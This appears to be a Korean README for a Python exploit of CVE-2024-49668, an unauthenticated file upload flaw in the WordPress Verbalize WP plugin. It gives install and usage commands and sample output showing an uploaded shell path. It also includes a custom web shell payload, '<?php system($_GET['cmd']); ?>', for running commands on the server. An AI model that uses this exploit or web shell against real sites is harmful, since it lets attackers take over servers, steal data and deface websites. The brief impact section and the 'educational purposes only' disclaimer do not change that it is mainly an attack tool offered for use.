
WordPress Verbalize WP 플러그인 <= 1.0 - 임의 파일 업로드 취약점
CVE-2024-49668은 WordPress Verbalize WP 플러그인 버전 1.0 이하에서 발견된 심각한 취약점입니다. 이 취약점은 인증되지 않은 공격자가 웹 서버에 웹 셸을 포함한 임의의 파일을 업로드할 수 있게 합니다. 문제는 파일 업로드 시 충분한 입력 검증 및 파일 형식 제한이 부족하기 때문에 발생합니다.
이 Python 스크립트는 CVE-2024-49668 취약점을 악용하여 Verbalize WP 플러그인을 사용하는 대상 WordPress 사이트에 셸 파일을 업로드합니다.
readme.txt에서 플러그인 버전을 확인하여 대상 사이트가 취약한지 검증합니다.requests 라이브러리다음 pip를 사용하여 필요한 라이브러리를 설치하세요:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
WordPress 사이트에 POST 요청을 실행합니다.
options:
-h, --help 도움말 메시지를 표시하고 종료합니다
-u, --url URL 대상 URL
-s, --shell SHELL 업로드할 셸 코드
기본적으로 스크립트는 phpinfo()를 실행하는 PHP 셸을 업로드합니다.
python CVE-2024-49668.py -u http://target.com
사용자 지정 PHP 셸 코드를 업로드할 수도 있습니다:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
CVE-2024-49668 취약점은 공격자가 악성 파일을 업로드하여 대상 서버에 대한 완전한 제어권을 얻을 수 있게 합니다. 이 취약점을 악용하면 데이터 유출, 무단 접근, 웹사이트 훼손 등 심각한 결과를 초래할 수 있습니다.
이 취약점으로부터 WordPress 사이트를 보호하려면 다음을 권장합니다:
이 도구는 교육 목적으로만 제공됩니다. 소유자의 명시적인 허가 없이 웹사이트에 대해 이 도구를 무단 사용하는 것은 불법입니다. 작성자는 이 도구의 오용 또는 이로 인한 손해에 대해 책임을 지지 않습니다.
2025-03-22 작성: Nxploited, Khaled alenazi